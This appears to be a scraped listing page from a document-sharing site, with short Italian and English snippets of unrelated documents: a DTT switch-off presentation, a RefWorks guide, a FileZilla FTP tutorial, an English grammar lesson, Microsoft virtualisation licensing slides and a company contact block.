DTT : DECODER, SWITCH- OFF PROCESS, CNID. Roberto de Martino Contents and Multimedia Department RAK/AGCOM DTT : DECODER, SWITCH- OFF PROCESS, CNID Roberto de Martino Contents and Multimedia Department RAK/AGCOM List of contents 1. Introduction 2. Decoder 3. Switch-off process 4. CNID Introduction 1. Introduction

Dettagli

RefWorks Guida all utente Versione 4.0

RefWorks Guida all utente Versione 4.0 Accesso a RefWorks per utenti registrati RefWorks Guida all utente Versione 4.0 Dalla pagina web www.refworks.com/refworks Inserire il proprio username (indirizzo e-mail) e password NB: Agli utenti remoti

Dettagli

Come installare e configurare il software FileZilla

Come installare e configurare il software FileZilla Come utilizzare FileZilla per accedere ad un server FTP Con questo tutorial verrà mostrato come installare, configurare il software e accedere ad un server FTP, come ad esempio quello dedicato ai siti

Dettagli

PRESENT SIMPLE. Indicativo Presente = Presente Abituale. Tom s everyday life

PRESENT SIMPLE. Indicativo Presente = Presente Abituale. Tom s everyday life PRESENT SIMPLE Indicativo Presente = Presente Abituale Prerequisiti: - Pronomi personali soggetto e complemento - Aggettivi possessivi - Esprimere l ora - Presente indicativo dei verbi essere ed avere

Dettagli

INFRASTRUCTURE LICENSING WINDOWS SERVER. Microsoft licensing in ambienti virtualizzati. Acronimi

INFRASTRUCTURE LICENSING WINDOWS SERVER. Microsoft licensing in ambienti virtualizzati. Acronimi Microsoft licensing in ambienti virtualizzati Luca De Angelis Product marketing manager Luca.deangelis@microsoft.com Acronimi E Operating System Environment ML Management License CAL Client Access License

Dettagli

Web Solution 2011 EUR

Web Solution 2011 EUR Via Macaggi, 17 int.14 16121 Genova - Italy - Tel. +39 010 591926 /010 4074703 Fax +39 010 4206799 Cod. fisc. e Partita IVA 03365050107 Cap. soc. 10.400,00 C.C.I.A.A. 338455 Iscr. Trib. 58109 www.libertyline.com

Dettagli